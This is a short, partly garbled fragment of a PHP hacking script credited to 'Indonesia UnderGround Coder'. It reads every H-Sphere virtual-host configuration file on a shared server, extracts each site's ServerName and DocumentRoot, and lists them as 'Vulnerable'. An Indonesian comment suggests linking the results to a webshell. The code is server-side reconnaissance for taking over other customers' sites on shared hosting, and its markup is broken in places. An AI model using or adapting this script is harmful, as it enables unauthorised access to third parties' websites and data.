ServerName DocumentRoot Vulnerable "; $chsphere = "/hsphere/local/config/httpd/sites/"; $opendir = opendir($chsphere); while (($file = readdir($opendir)) !== false) { $path = $chsphere.$file; $readfile = fopen($path,"r"); $content = fread($readfile,filesize($path)); fclose($readfile); $DocumentRoot = explode('DocumentRoot', $content ); $DRoot = explode('ServerName', $DocumentRoot[1] ); $ServerName = explode('ServerName', $content ); $SName = explode('ServerAlias', $ServerName[1] ); $dir .= "".$SName[0]."".$DRoot[0]."unsecure"; //disini kamu bisa bikin link ke webshellnya. } closedir($opendir); $dir .= ""; ?> <?php echo $title ?> - Billgate

..:: - Indonesia UnderGround Coder ::..